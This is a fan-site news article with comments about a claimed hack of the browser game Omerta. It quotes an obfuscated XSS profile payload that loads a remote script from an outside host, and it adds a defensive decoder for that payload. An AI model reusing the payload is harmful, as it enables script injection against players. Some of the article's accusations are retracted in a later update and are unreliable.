22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4797d 12h 20m 11s ago by LL
Comments: 164
Views: 67,432
Votes: 0 (0 average)
Version: 3.2
article
Last weekend Omerta had some downtime. The admins posted news that something was wrong with the server: a hardware problem, as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due to the lack of proper coding on the hitlist page, hackers were able to run a "query" and get into the Omerta database.

Result? All the information you could wish for "could" have been downloaded. This includes: successors, bullet amounts, passwords (MD5 hashed), emails, testaments... everything!

After Brando's news post, the hackers got kind of "pissed/annoyed" that the admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame, much the same as what happened versions ago (Stidda <-> Barafranca).

They reached about 800 profiles before it was noticed and the admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once the page has loaded, create a script element, set its source to http://a.itsr.ru/knas2.js, and append it to the page's head.


This script loaded an unknown JavaScript file onto the profiles, which could have been used to cause harm once an affected profile was loaded. Unfortunately, we don't have that JavaScript file, and thus cannot analyse the rest of the hackers' intentions.
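
The handler above hides its strings behind String.fromCharCode, so anyone reviewing stored profile markup has to decode it before the intent is visible. The following is an added example, not code from the original article or from Omerta: a static triage helper that decodes the character-code calls without executing anything and reports what the handler does. The function names (decodeCharCodes, triage) and the finding labels are assumptions made for this sketch.

```javascript
// Added example: static triage of an injected event-handler value.
// SAMPLE is the onLoad value quoted in the article, held as a string and
// never evaluated. Function names and finding labels are hypothetical.
const SAMPLE =
  "m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));" +
  "m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, " +
  "117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( " +
  "String.fromCharCode(104,101,97,100))[0].appendChild(m)";

// Replace each String.fromCharCode(n, n, ...) call that has only decimal
// literal arguments with the quoted string it would produce.
// Calls with variables or expressions as arguments are left untouched.
function decodeCharCodes(source) {
  const call = /String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;
  return source.replace(call, (whole, args) => {
    const codes = args.split(",").map((n) => parseInt(n.trim(), 10));
    if (codes.some((c) => c > 0xffff)) return whole; // not a UTF-16 code unit
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Decode, then report the behaviours a reviewer cares about in user markup.
function triage(source) {
  const decoded = decodeCharCodes(source);
  const remoteUrls = (decoded.match(/"https?:\/\/[^"]+"/g) || []).map((u) => JSON.parse(u));
  const findings = [];
  if (/createElement\(\s*"script"\s*\)/i.test(decoded)) findings.push("creates-script-element");
  if (remoteUrls.length > 0 && /\.src\s*=/.test(decoded)) findings.push("sets-remote-src");
  if (/appendChild\(/.test(decoded)) findings.push("appends-to-dom");
  return { decoded, remoteUrls, findings };
}

const report = triage(SAMPLE);
console.log(report.decoded);
console.log(report.findings.join(", "));
```

Run over stored profile fields, a non-empty findings list marks a profile for clean-up; the decoded text confirms the three strings given in the translation above.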

Update:
We have now heard that the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup on all of those profiles at once.

Update:

As further proof, the hackers have released a list of 515 users with their set testament.

They also released the Global Vars of the Barafranca server.

Update 28/09:

After six days of silence in the Admins' latest news section, during which our invitation to comment on this article with the story from the admins' point of view was ignored, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Ingames of our crew have also been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later that day, a statement was released on Omerta in which Bramblerose states that last Thursday testament info was indeed obtained through an XSS exploit. Today they have taken measures to protect the players whose data was obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, the global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments which shows a list of family names and then two lists of user IDs who were the successors of the corresponding families at the time of the hack, which is further proof that the database was completely accessible.

Update 30/09:
We're sorry for connecting the downtime with the hacks; we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems, and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
comments

Anonymous (21:36:47 - 27-09)
Hugobust at 21:29:33 on 27/09:
Facebook also got all your private data, so your argument is invalid.

great comparing _o_

:z
Hugobust (21:29:33 - 27-09)
Facebook also got all your private data, so your argument is invalid.
Anonymous (19:25:37 - 27-09)
brando

it isn't fake at all,
even #help admitting on their way of talking

your team failed!
what about our privacy?
go away and let others do it better,
last version all we heard are things covered in,

2nd hack this version, use people who can protect it!
klementino Netherlands (16:50:35 - 27-09)
sbanks at 10:18:18 on 27/09:
Brando - rly at 07:13:05 on 26/09:
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/

since i don't have a source how come i have the following information:

testament from about ~100 users : Testament

and

global vars from your server

why just 100 members? now you fuck people over on selection, if you come with this proof, come with all users you have.
Anonymous (15:58:27 - 27-09)
How can u call a hack legit?
Anonymous (15:42:50 - 27-09)
It's not about hackers being 'right' in this case, it's about Brando being wrong.

Time and time again the player-base reacted on changes or events that were happening ingame, either intentional or not.
Every single time players get or find a platform to share their opinion about stuff that took place.
And almost every time the crew either ignored or dismissed the general opinion in those topics since they are either 'wrong', stupid or LOLOMGCHEATERSHAHA.
Crushing down every comment on Lackeys for example with 'Lackey User' isn't a real way to communicate. You might as well close down the fucking newspost from the start since you show no intention AT ALL to listen to issues that get addressed. And that's fine, but then don't act like you do.

And that same problem is still ongoing, even today Brando dismissed Lackey complaints on FB by calling the poster a stupid cheater or something.
At the start of this version, or end of last, can't remember, the community was promised a tool to help decide resets. Finally 'we' would be able to decide when a version was done. It was the end of all problems, THE way to turn omerta back into a community game.
7 months+ later, nothing.

Where is it?
"It's coming!"
Where is it?
"It's coming!"
Where is it?
"It's coming!"
Where is it?
"Fucking scripts!!"
Where is it?
"Lackeys v2 have prio!"

Etc.

And now, once again, we are faced with the same old incapability to respond to subjects that matter. And it doesn't even matter if this hack is legit or not, although I think it's hard to call the testament and other parses fake since those look way too real to be fake, we are, once again, without an official statement. So yeah, omerta prolly got hacked, because if they weren't there would have been 10 newsposts about it, all OB channels would be closed and sbanks and others would have been permanently g-lined. The lack of those measures kinda hints to them knowing the hack was legit, since if acted upon now there would be no reason for the hackers to not release everything they found.

All we have is a 'funny' Brando responding with some loose comments that don't address the issue at all.
The hack, if real, isn't justified by their behaviour, by any means.
Yet, a 'crew' with such incompetence as shown in the past few weeks/months would have been fired from any other job prolly. Personal information from YOUR customers may have been exposed due to a weakness in YOUR software. And calling sbanks a drunk fuck doesn't make that concern go away, if anything it increases it.

So statement time brando, or are you still claiming it's just one big hoax, and that the Testaments and Global Vars posted are all fake as well?
Anonymous (14:23:01 - 27-09)
Hi all readers

For starter what should i include with readers are the "hackers" part of the readers as well?
I hope that most of the omerta (barafranca) players play omerta cuz they like it and they don't mind the changes so much as they come and go.

Wondering if some players because they are bored or any other insulting reason i can come up with, starting Hacking Omerta if ur tired of it or don't like the changes please just leave.

Think most of the players will agree the security of the Omerta Servers are rubbish and they should fix it, but what do u thinks helps more laying all information of all or select group of Omerta players on the table is going to solve that?, Might be smart to contact crew about it. And if Ur so "Smart" with codes etc. JOIN THEM? tell Ur ideas help them why hack? wanna ruin the game for others?

thats 1 side of the story,

Beyond crew;

Nice job on the War Articles i like to read the articles and whine about and/or show off :p
It's a good thing that as last reserve the hackers come here and tell the crew about it but u should be way more careful with laying info on the table if u wanna do ur job well from my point of view.
I think u should that in reconsideration that Ur(crew) not running the game.
??Where did "Times" go??

Anyway all have a fun (last) part of the version and many more 2 come
Laterz
Anonymous (13:50:53 - 27-09)
First a joint then my story..
Anonymous (12:52:20 - 27-09)
Owned, Brando. They had full access and you know it. Well..you do now.
sbanks Guatemala (10:18:18 - 27-09)
Brando - rly at 07:13:05 on 26/09:
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/

since i don't have a source how come i have the following information:

testament from about ~100 users : Testament

and

global vars from your server
Anonymous (05:50:06 - 27-09)
Brando - rly at 02:20:38 on 26/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@


btw dunno if you read what some guy below said or you're just too stuck up on this one post and calling Sbanks names

but someone said something about that old list that was hacked and they were actually on it..... a few days old but they were there bulletcount and all .. now tell me ... that was made up too mate ? or what.

I'm failing to understand a lot of things at this moment
as for that list I wasn't even around then ;)

i really liked what you do as the game guy Brando lol but well you stooped very low with replying here the way you did it could have been done so much more professional from your part .. i mean you did get awfully defensive if nothing happened there is no need to jump into such conclusions of lies and such :) just could politely suggest an interview.. ah well live and learn huh :D maybe you'll take my advice next time :P
Anonymous (05:43:49 - 27-09)
nice guy you are rix imagine getting second chances about abusing crew from him :') ......

this bloke is a bloody joke i can understand that he may be frustrated with what's written but repeating the same abuse thing again and again is childish and makes me think what kind of child are we paying to play online o.O

i mean Brando answer this.....

have you ever emailed Barafranca ? :') lucky to ever get a reply let alone within a week i suggest unless you changing the way you do your emails

i dare say you can't say shit about sbanks and OB replying to msg's it's been not long at all and i don't even think unless there was a source that Sbanks would even make this up as said below it seems pretty real leak to me

and what does sbanks have to gain from posting lies Brando ? nothing nothing at all he has no need to lie however...... how much do you have to lose... hm lets see

10k x 2.80 euros just for one hmm im guessing you got more to lie for Brando ;)

please drop the insults it makes you look pathetic and unable to stand criticism grow up!

even if omerta was hacked .. my bet is you stand to lose more from covering it up than making it out to be a lie .... so lets get it out there for real soon huh :) would be a nice interview to see when you guys get time..
Rix Netherlands (10:19:38 - 26-09)
Dear Brando,

We always like to take interviews or in any other way put anything up on our site other than the plain war articles. However, being that most of us do not like this version at all and since most of us are busy with real life things, such as school or work, or working on other projects, we, at this moment, do not have the time for an interview, even though we would really like to hear the admin's side of the story. For example, out of our current 8-11 crew members, only 2 are online at least once a day, and only 5 once a week. This is our fault, we know, but blaming us for it is not going to change everything.

Therefore, I kindly suggest to have patience until both parties (Omerta crew and OBN crew) have time or, when you want to have your reply out in the open as soon as possible (which I would understand you want in this certain situation), use your extensive freedom of speech on our site and write an excessive comment including explanations on how these three, for us, coherent, events (downtime, database setup leak and profiles infected with code) could have taken place or a description on what really happened.

Furthermore, I would like to repeat a previous notice of mine that we normally would remove posts including excessive name calling and insults on our journalistic integrity. Please see this as your second warning. Thank you in advance.
Brando - rly (07:13:05 - 26-09)
NB Sbanks - I emailed - did not yet contact me.

I don't pretend to be 'a dev' or to have any specific technical expertise of any merit. I am working with skilled people who do that.

My complaint here is simple: this 'news' article is just a made up pack of lies.

I'd like to interview Sbanks about his source... knowing full well that *he does not have one*

Over and out.

o/
Brando - rly (02:20:38 - 26-09)
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
Anonymous (20:05:31 - 23-09)
Anonymous at 19:21:36 on 23/09:
this brando guy, what a humour, doesn't know shit about coding as well as his entire team, and then comes here acting out and shit. Trololol.

Brando ur a joke like your 99% random game and your dipshit crew members.


xD i was gonna c/p you this topic :P and have a lol

see you tomorrow ;) bed time now bud :P
Anonymous (19:21:36 - 23-09)
this brando guy, what a humour, doesn't know shit about coding as well as his entire team, and then comes here acting out and shit. Trololol.

Brando ur a joke like your 99% random game and your dipshit crew members.
Anonymous (18:44:57 - 23-09)
i definitely can imagine omerta covering up another hack cause they know how the community responded last time.

So yes i think omerta should come with a better statement than they did now.
Anonymous (10:01:49 - 23-09)
Without questioning the article since that turns into another yeah really!!/no not really!! story; the database looks pretty fucking legit.

Ballantines Serbia (09:12:00 - 23-09)
Rix at 08:55:17 on 23/09:
Brando - rly at 05:22:18 on 23/09:
Sbanks email me.

I want a word.

You know my mail and if you don't you can get it by asking in #help

You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.

This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.

I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.

Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.

Short version: Fail, 'News'-hack.

There: Now you *know* it is *me*

:@
We gladly would have and still will put in your side of the story, and even write down or adjust our own conclusions like we did with the current evidence we got if you bring your own evidence or credible explanation.

Normally we would remove posts like these for the name calling by the way.


Then do it Rix, he would remove it if someone said that to him on omerta forums...